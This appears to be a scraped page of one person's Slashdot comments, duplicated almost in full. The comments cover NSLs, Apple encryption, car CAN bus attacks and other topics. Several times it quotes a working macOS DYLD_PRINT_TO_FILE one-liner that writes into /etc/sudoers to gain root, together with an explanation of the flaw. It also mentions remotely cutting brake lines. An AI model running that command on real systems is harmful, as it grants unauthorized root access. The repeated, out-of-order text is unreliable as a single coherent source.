A piece of paper with the authority to throw you in jail.
True, but they would have to go to court to accomplish that.
My understanding is that all NSLs come with a gag order. If you go to a lawyer you violate the secrecy gag.
Not true. The EFF says: "Can I talk to a lawyer if I receive an NSL? Yes, you can talk to an attorney for legal advice if you receive an NSL, but the lawyer is then bound by the gag order just as you are."
Also, not all NSLs come with a gag order, just most.
I'm fairly sure an NSL can compel them to break future updates of hardware and software so that a wiretap is workable, and the gag order will prevent them from telling anyone about the new compromise.
Well, the people doing the biggest attacks against NSLs, the EFF,has this to say:
"While NSLs are unconstitutional, even the government admits that they can only be used to obtain limited information, which does not include forcing anyone to backdoor a product."
Do you believe the EFF doesn't know what it is talking about?
If I had said "it's not impossible because you can guess the 256-bit decryption key and be lucky" you'd have a point, but P=NP is not a pragmatic impossibility, it is very possible. Wikipedia reports a poll of 151 researchers in 2012 placing the probability somewhere between 9% and 17%.
No one today has publicly shown a way to decode the encryption method used by Apple, so pragmatically (meaning what is reasonable to expect or demand), it is considered impossible for Apple to comply with giving the FBI "real time access to text messages sent" by iMessage. Whether P=NP or not, until the encryption method is broken, the FBI demand can be considered "impossible" since Apple has no way today to comply.
An NSL cannot force a company to modify their hardware or software, only to grant access to what they already have. It is just a special kind of subpoena, one that the head of the FBI can issue without going to a court (which is why I think it would fail if brought to the Supreme Court), and can require the recipient not to divulge that it occurred. It only grants access to existing information, and cannot compel them to perform actions beyond pulling stored data or attaching a wire tap. Forcing a company to modify their user software to obtain access to user data has been ruled by courts to be beyond the scope of what a subpoena can compel.
The answer is in the second sentence of the article: The Justice Department obtained a court order that required Apple to provide real time access to text messages sent between suspects in an investigation involving guns and drugs.
You are confusing the literal meaning of impossible with the pragmatic meaning. People would say it is impossible to walk through a concrete wall, but quantum mechanics says it is possible, just so unlikely that it counts as impossible from a practical standpoint.
Isn't this wonderful? From the Fourth Amendment, we now have a situation where Privacy == Obstruction.
How in the FUCK did THAT happen?!?
Because the Fourth Amendment doesn't guarantee you absolute privacy, it grants "the right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures", meaning until a court has issued an order to grant such access "upon probable cause". In this case the court issues such an order. The question is, given the circumstances, what Apple is legally required to do. Hint: they are not required to change their software to create the ability for the government to get access, only to give the government what they already have access to.
BTW, this really should shut up all the slashtards that say that Apple secretly colludes with the Gummint; but it won't.
I think your faith in a human's ability to logically think past their biases is overblown. They will just claim it is a PR stunt to fool people into believing Apple can't read the messages while they secretly handing over all the data. Never try to argue with a conspiracist since, no matter how sound your evidence, you will never win them over. As the saying goes, never argue with a fool, lest you are brought down to his level.
If "security" is just protecting against external threats, and she knew of internal threats, then a private email server makes sense for some types of email.
Yes, but the "internal" threats were these pesky things like the Inspector General, Congressional Oversight, Special Prosecutors, FOIA requests, etc.
An article I saw said what wasn't released was mostly a database of pictures and messages exchanged through the site. It said there were two problems with releasing the pictures, the database is very large (compared to the text files that compress fairly well), and 40% of the pictures were dick shots and they didn't want to release those. They could still release the database of messages though. I think they are doing the same things as the Snowden leaks, release parts at a time to keep the interest alive, and slowly drive the spike through AM's heart.
It's not a false claim, it's a joke. Laugh. Relax.
So someone takes a swing at me and I say WTF? and they say it was just a joke, then swing again and say it is still a joke. I can still hit him and call it self defense, joke or not, and he would deserve it. People will often call their bad acts a joke after the fact to avoid responsibility. It's like in this video where a guy tries to steal a purse, then laughs as if a prank, then tries to steal it again (only to get beat by the bus driver).
Did the student mean for his tweet to be a joke when he did it? I don't know, but based on what little I have read, which I admit isn't enough to ACTUALLY know the truth, it at least seems it wasn't and he is now in delf-defense mode.
You don't seriously think the handbrake is an "emergency brake", right? Good grief, please be kidding.
It isn't a handbrake in my vehicle since it is on the floor, and such systems were originally put in place to provide a backup braking system in case the hydraulic system failed, especially since hydraulic braking systems used to be single-cylinder systems and were only mandated to use dual master cylinders starting in 1976. They were later adapted to provide a backup parking brake to supplement the vehicle being left in gear, and are now often also referred to as a parking brake.
So yes, I think of it as an "emergency brake". But then ideas like yours is why most people never think to use it when their regular brakes fail, just like they don't think to turn off the ignition if the throttle sticks.
First, How is that you feel qualified to speak on this subject when you don't even know the difference between the second coming of Ol' Dirty Bastard, and On-Board Diagnostics?
The linked article explicitly spelled out the ODB-II, so I addressed that. The article said "The device that the UCSD researchers exploited for those attacks was a so-called OBD2 dongle"
Second, CAN is a protocol which is used with OBD-II. It is also used for communications between modules. Getting onto any bus on which the PCM speaks is sufficient for making an attack against the powertrain.
Which is why I said "accessing the CAN bus will probably yield the same capabilities."
Third, if the PCM is located under the hood, which it often is, then the diagnostic line (whether it's a CAN line like it usually is on modern cars, or one of the other protocols used with OBD-II) may well run through an exposed harness under the hood.
If you are going to break into the engine compartment, then it isn't that different than breaking into the car.
For example, in the Audi A8, the E-Box which contains the PCM, TCM and so on is right up against the firewall and there's a very short bit of harness with the diagnostic line in which doesn't get exposed. And in my particular vehicle, a very early 1997 A8 Quattro, the ABS controller is located inside up under the dashboard, so that diagnostic line (in my case a K-line, not CAN) is also inaccessible. But since there's only one diagnostic line which literally goes to all the modules, in the cars which immediately follow mine (starting in late 1997) which have the ABS controller located directly on the ABS module under the hood, it's relatively easy to access the bus — upon which live the PCM, TCM, ABS, and SRS. I think those vehicles actually have a gateway between the powertrain (which includes the ABS in modern vehicles) and SRS, and the infotainment bus, which includes the steering wheel controls. Some of the details of cars which are not mine are a bit hazy.
TL;DR: You don't know what you're on about, and sometimes a sensitive wire is accessible from beneath the hood, even if you can't raise it.
What sensitive wire is under the hood isn't that big of a problem, unless it is at the bottom of the compartment and easily accessible from underneath, because breaking into under the hood is almost the same as breaking into the car's interior. Climbing under a car and accessing directly exposed wires via a harness is a different matter, and what I was talking about. I never mentioned breaking into the hood-protected area to get to the bus.
The difference is to access the ODB-II requires getting into the vehicle without the owner knowing,
That depends on the vehicle. Some can be raised up, crawled beneath, and the harness accessed. Some, you can't get to it from there. Once you get there you only need three lines for OBD-II.
That is the CAN bus, not the ODB-II, but you are right, and I didn't want to spend the time explaining it, that accessing the CAN bus will probably yield the same capabilities. The CAN bus runs to a lot of components like the transmission and is often also exposed on the car's underside.
yes but you can't snip the brakes when the vehicle is going 75 MPH on the freeway...
With a small remotely operated tube cutter, yes. (two actually due to dual-cylinder brake systems) Same as this device, other than one device versus two. The difference is to access the ODB-II requires getting into the vehicle without the owner knowing, while attaching a tube cutter only requires access to the underside of the vehicle. The latter is actually easier. In both cases pressing the emergency brake (ever wonder why it is called that?) would activate the rear brakes unless that physical cable were also cut.
Sounds like the ideal sort of thing to be able to disable (or provide a random response to) in the browser.
Everything your browser does that is different than other browsers can be used to fingerprint you, so sending a random response would be an identifiable trait to narrow the group they think you are in. Better to send nothing, assuming most people's browsers don't send anything, or whatever the response a desktop sends when asked for its battery level.
Unlike the first commenter, I regularly see savings of 10-15 cents per gallon. With an 18 gallon tank, that could mean $2.70 in savings...much more than 30 cents.
The first poster said "it's not worth saving 30 cents a gallon on gas", so for an 18 gallon tank that would be $5.40.
It also does not take very long... And when you are in an unfamiliar area, it has benefits for savings and simply locating gas! Going to read the new terms now...
I agree. My tank is much larger 18 gallons, and prices around me vary by about 60 cents, so I can easily save $5 to $10 if needing to fill-up in an unfamilar area versus stopping at the first place I see.
Also missing is the motivation - possible oil and gas reserves under the South China Sea. China wants to strengthen their territorial claim and then say the entire area is theirs.
They already say the entire area is theirs (see the dotted red line in the article). Their plan is for these islands to give them a stronger presence so they can militarily force the issue in the future.
Baker claims the spreadsheet compelled more Google employees to ask and receive "equitable pay based on data in the sheet."
90% of drivers think they are better than the average driver, and I would bet 90%+ of workers think they are better than average, and would therefore expected to be paid above the median (note for the statistically challenged - 90% of a group cannot be above the median). This study will give them data to know where they are on the graph. How will management deal with 90% of their workers demanding to be paid more since they are being paid below what they think they should be based on their (biased) self-assessment?
It's a hip way of saying small. He found that invoking DYLD_PRINT_TO_FILE runs as root, and as such can allow a user to write to/etc/sudoers, giving the user sudo privileges, letting them sudo to root.
echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
He found that invoking DYLD_PRINT_TO_FILE runs as root, and as such can allow a user to write to/etc/sudoers, giving the user sudo privileges, letting them sudo to root.
echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
Small correction. DYLD_PRINT_TO_FILE doesn't run as root, it just tells the dynamic library where to write error logs. The problem is it is accepted and used by child processes, even setuid ones, so by setting the environment variable, then calling sudo (which runs as root) with an invalid argument that will cause an error to be logged, he can create or append to any file on the machine he wants. He used the sudoers file for his example, but I am sure there are many other possibilities.
BTW, this is a similar exploit to the LD_LIBRARY_PATH exploit from many years ago where you could get a setuid program to use your dynamic library instead of the system one, thereby getting your code to run as root. It was fixed by having the loader check if the program uid doesn't equal euid and if so ignore the LD_LIBRARY_PATH variable. Apparently programmers at Apple are guilty of not learning from history and are therefore repeating it.
That was a major point toward the end of the linked article. The court said:
“The district court’s holding would logically result in the loss of a reasonable expectation of privacy in face-to-face conversations where one party is aware that a participant in the conversation may have a modern cellphone.”
Basically, if you are having a "private" conversation, and know that someone present may have a cell phone, then this precedent may mean you no longer have an expectation of privacy for the conversation.
Slashdot Mirror
Well, the EFF is only reporting what the government official 'said' was true.
Do you have a creditable source that says otherwise, or just statements by people speculating to fit their theories?
A piece of paper with the authority to throw you in jail.
True, but they would have to go to court to accomplish that.
My understanding is that all NSLs come with a gag order. If you go to a lawyer you violate the secrecy gag.
Not true. The EFF says: "Can I talk to a lawyer if I receive an NSL? Yes, you can talk to an attorney for legal advice if you receive an NSL, but the lawyer is then bound by the gag order just as you are."
Also, not all NSLs come with a gag order, just most.
I'm fairly sure an NSL can compel them to break future updates of hardware and software so that a wiretap is workable, and the gag order will prevent them from telling anyone about the new compromise.
Well, the people doing the biggest attacks against NSLs, the EFF,has this to say:
"While NSLs are unconstitutional, even the government admits that they can only be used to obtain limited information, which does not include forcing anyone to backdoor a product."
Do you believe the EFF doesn't know what it is talking about?
If I had said "it's not impossible because you can guess the 256-bit decryption key and be lucky" you'd have a point, but P=NP is not a pragmatic impossibility, it is very possible. Wikipedia reports a poll of 151 researchers in 2012 placing the probability somewhere between 9% and 17%.
No one today has publicly shown a way to decode the encryption method used by Apple, so pragmatically (meaning what is reasonable to expect or demand), it is considered impossible for Apple to comply with giving the FBI "real time access to text messages sent" by iMessage. Whether P=NP or not, until the encryption method is broken, the FBI demand can be considered "impossible" since Apple has no way today to comply.
An NSL cannot force a company to modify their hardware or software, only to grant access to what they already have. It is just a special kind of subpoena, one that the head of the FBI can issue without going to a court (which is why I think it would fail if brought to the Supreme Court), and can require the recipient not to divulge that it occurred. It only grants access to existing information, and cannot compel them to perform actions beyond pulling stored data or attaching a wire tap. Forcing a company to modify their user software to obtain access to user data has been ruled by courts to be beyond the scope of what a subpoena can compel.
The answer is in the second sentence of the article: The Justice Department obtained a court order that required Apple to provide real time access to text messages sent between suspects in an investigation involving guns and drugs.
You are confusing the literal meaning of impossible with the pragmatic meaning. People would say it is impossible to walk through a concrete wall, but quantum mechanics says it is possible, just so unlikely that it counts as impossible from a practical standpoint.
Isn't this wonderful? From the Fourth Amendment, we now have a situation where Privacy == Obstruction. How in the FUCK did THAT happen?!?
Because the Fourth Amendment doesn't guarantee you absolute privacy, it grants "the right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures", meaning until a court has issued an order to grant such access "upon probable cause". In this case the court issues such an order. The question is, given the circumstances, what Apple is legally required to do. Hint: they are not required to change their software to create the ability for the government to get access, only to give the government what they already have access to.
BTW, this really should shut up all the slashtards that say that Apple secretly colludes with the Gummint; but it won't.
I think your faith in a human's ability to logically think past their biases is overblown. They will just claim it is a PR stunt to fool people into believing Apple can't read the messages while they secretly handing over all the data. Never try to argue with a conspiracist since, no matter how sound your evidence, you will never win them over. As the saying goes, never argue with a fool, lest you are brought down to his level.
If "security" is just protecting against external threats, and she knew of internal threats, then a private email server makes sense for some types of email.
Yes, but the "internal" threats were these pesky things like the Inspector General, Congressional Oversight, Special Prosecutors, FOIA requests, etc.
An article I saw said what wasn't released was mostly a database of pictures and messages exchanged through the site. It said there were two problems with releasing the pictures, the database is very large (compared to the text files that compress fairly well), and 40% of the pictures were dick shots and they didn't want to release those. They could still release the database of messages though. I think they are doing the same things as the Snowden leaks, release parts at a time to keep the interest alive, and slowly drive the spike through AM's heart.
but I'm fucking a woman into a long term relationship
But you're not fucking a woman who promised "to death do us part."
Depending on the husband, you might still get that.
(Try to avoid obstacles.)
But in my monster truck that takes the fun out of it!
It's not a false claim, it's a joke. Laugh. Relax.
So someone takes a swing at me and I say WTF? and they say it was just a joke, then swing again and say it is still a joke. I can still hit him and call it self defense, joke or not, and he would deserve it. People will often call their bad acts a joke after the fact to avoid responsibility. It's like in this video where a guy tries to steal a purse, then laughs as if a prank, then tries to steal it again (only to get beat by the bus driver).
Did the student mean for his tweet to be a joke when he did it? I don't know, but based on what little I have read, which I admit isn't enough to ACTUALLY know the truth, it at least seems it wasn't and he is now in delf-defense mode.
You don't seriously think the handbrake is an "emergency brake", right? Good grief, please be kidding.
It isn't a handbrake in my vehicle since it is on the floor, and such systems were originally put in place to provide a backup braking system in case the hydraulic system failed, especially since hydraulic braking systems used to be single-cylinder systems and were only mandated to use dual master cylinders starting in 1976. They were later adapted to provide a backup parking brake to supplement the vehicle being left in gear, and are now often also referred to as a parking brake.
So yes, I think of it as an "emergency brake". But then ideas like yours is why most people never think to use it when their regular brakes fail, just like they don't think to turn off the ignition if the throttle sticks.
That is the CAN bus, not the ODB-II
First, How is that you feel qualified to speak on this subject when you don't even know the difference between the second coming of Ol' Dirty Bastard, and On-Board Diagnostics?
The linked article explicitly spelled out the ODB-II, so I addressed that. The article said "The device that the UCSD researchers exploited for those attacks was a so-called OBD2 dongle"
Second, CAN is a protocol which is used with OBD-II. It is also used for communications between modules. Getting onto any bus on which the PCM speaks is sufficient for making an attack against the powertrain.
Which is why I said "accessing the CAN bus will probably yield the same capabilities."
Third, if the PCM is located under the hood, which it often is, then the diagnostic line (whether it's a CAN line like it usually is on modern cars, or one of the other protocols used with OBD-II) may well run through an exposed harness under the hood.
If you are going to break into the engine compartment, then it isn't that different than breaking into the car.
For example, in the Audi A8, the E-Box which contains the PCM, TCM and so on is right up against the firewall and there's a very short bit of harness with the diagnostic line in which doesn't get exposed. And in my particular vehicle, a very early 1997 A8 Quattro, the ABS controller is located inside up under the dashboard, so that diagnostic line (in my case a K-line, not CAN) is also inaccessible. But since there's only one diagnostic line which literally goes to all the modules, in the cars which immediately follow mine (starting in late 1997) which have the ABS controller located directly on the ABS module under the hood, it's relatively easy to access the bus — upon which live the PCM, TCM, ABS, and SRS. I think those vehicles actually have a gateway between the powertrain (which includes the ABS in modern vehicles) and SRS, and the infotainment bus, which includes the steering wheel controls. Some of the details of cars which are not mine are a bit hazy.
TL;DR: You don't know what you're on about, and sometimes a sensitive wire is accessible from beneath the hood, even if you can't raise it.
What sensitive wire is under the hood isn't that big of a problem, unless it is at the bottom of the compartment and easily accessible from underneath, because breaking into under the hood is almost the same as breaking into the car's interior. Climbing under a car and accessing directly exposed wires via a harness is a different matter, and what I was talking about. I never mentioned breaking into the hood-protected area to get to the bus.
The difference is to access the ODB-II requires getting into the vehicle without the owner knowing,
That depends on the vehicle. Some can be raised up, crawled beneath, and the harness accessed. Some, you can't get to it from there. Once you get there you only need three lines for OBD-II.
That is the CAN bus, not the ODB-II, but you are right, and I didn't want to spend the time explaining it, that accessing the CAN bus will probably yield the same capabilities. The CAN bus runs to a lot of components like the transmission and is often also exposed on the car's underside.
yes but you can't snip the brakes when the vehicle is going 75 MPH on the freeway...
With a small remotely operated tube cutter, yes. (two actually due to dual-cylinder brake systems) Same as this device, other than one device versus two. The difference is to access the ODB-II requires getting into the vehicle without the owner knowing, while attaching a tube cutter only requires access to the underside of the vehicle. The latter is actually easier. In both cases pressing the emergency brake (ever wonder why it is called that?) would activate the rear brakes unless that physical cable were also cut.
Sounds like the ideal sort of thing to be able to disable (or provide a random response to) in the browser.
Everything your browser does that is different than other browsers can be used to fingerprint you, so sending a random response would be an identifiable trait to narrow the group they think you are in. Better to send nothing, assuming most people's browsers don't send anything, or whatever the response a desktop sends when asked for its battery level.
Before you push that line, look up Iran Air flight 655. Russia is worse, but not the only one.
Unlike the first commenter, I regularly see savings of 10-15 cents per gallon. With an 18 gallon tank, that could mean $2.70 in savings...much more than 30 cents.
The first poster said "it's not worth saving 30 cents a gallon on gas", so for an 18 gallon tank that would be $5.40.
It also does not take very long... And when you are in an unfamiliar area, it has benefits for savings and simply locating gas! Going to read the new terms now...
I agree. My tank is much larger 18 gallons, and prices around me vary by about 60 cents, so I can easily save $5 to $10 if needing to fill-up in an unfamilar area versus stopping at the first place I see.
Also missing is the motivation - possible oil and gas reserves under the South China Sea. China wants to strengthen their territorial claim and then say the entire area is theirs.
They already say the entire area is theirs (see the dotted red line in the article). Their plan is for these islands to give them a stronger presence so they can militarily force the issue in the future.
Baker claims the spreadsheet compelled more Google employees to ask and receive "equitable pay based on data in the sheet."
90% of drivers think they are better than the average driver, and I would bet 90%+ of workers think they are better than average, and would therefore expected to be paid above the median (note for the statistically challenged - 90% of a group cannot be above the median). This study will give them data to know where they are on the graph. How will management deal with 90% of their workers demanding to be paid more since they are being paid below what they think they should be based on their (biased) self-assessment?
It's a hip way of saying small. He found that invoking DYLD_PRINT_TO_FILE runs as root, and as such can allow a user to write to /etc/sudoers, giving the user sudo privileges, letting them sudo to root.
echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
He found that invoking DYLD_PRINT_TO_FILE runs as root, and as such can allow a user to write to /etc/sudoers, giving the user sudo privileges, letting them sudo to root.
echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
Small correction. DYLD_PRINT_TO_FILE doesn't run as root, it just tells the dynamic library where to write error logs. The problem is it is accepted and used by child processes, even setuid ones, so by setting the environment variable, then calling sudo (which runs as root) with an invalid argument that will cause an error to be logged, he can create or append to any file on the machine he wants. He used the sudoers file for his example, but I am sure there are many other possibilities.
BTW, this is a similar exploit to the LD_LIBRARY_PATH exploit from many years ago where you could get a setuid program to use your dynamic library instead of the system one, thereby getting your code to run as root. It was fixed by having the loader check if the program uid doesn't equal euid and if so ignore the LD_LIBRARY_PATH variable. Apparently programmers at Apple are guilty of not learning from history and are therefore repeating it.
That was a major point toward the end of the linked article. The court said:
“The district court’s holding would logically result in the loss of a reasonable expectation of privacy in face-to-face conversations where one party is aware that a participant in the conversation may have a modern cellphone.”
Basically, if you are having a "private" conversation, and know that someone present may have a cell phone, then this precedent may mean you no longer have an expectation of privacy for the conversation.